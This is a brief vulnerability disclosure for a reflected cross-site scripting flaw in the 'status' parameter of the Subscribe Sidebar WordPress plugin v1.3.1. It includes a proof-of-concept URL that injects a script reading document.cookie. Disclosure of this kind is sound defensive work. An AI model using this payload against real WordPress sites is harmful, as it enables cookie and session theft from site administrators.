Subscribe Sidebar plugin by Blubrry v1.3.1 – Reflected XSS – 20 Jun 2020

Tested against – Subscribe Sidebar plugin by Blubrry v1.3.1 | WordPress v5.4.1

Reflected XSS

Reflected XSS

[https://wordpress.org/plugins/subscribe-sidebar/](https://wordpress.org/plugins/subscribe-sidebar/)

The “status” GET parameter in “subscribe_sidebar.php” is vulnerable to reflected XSS attacks.

POC

/wp-admin/options-general.php?page=subscribe_sidebar.php&status=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

Leave a Reply

Your email address will not be published. Required fields are marked *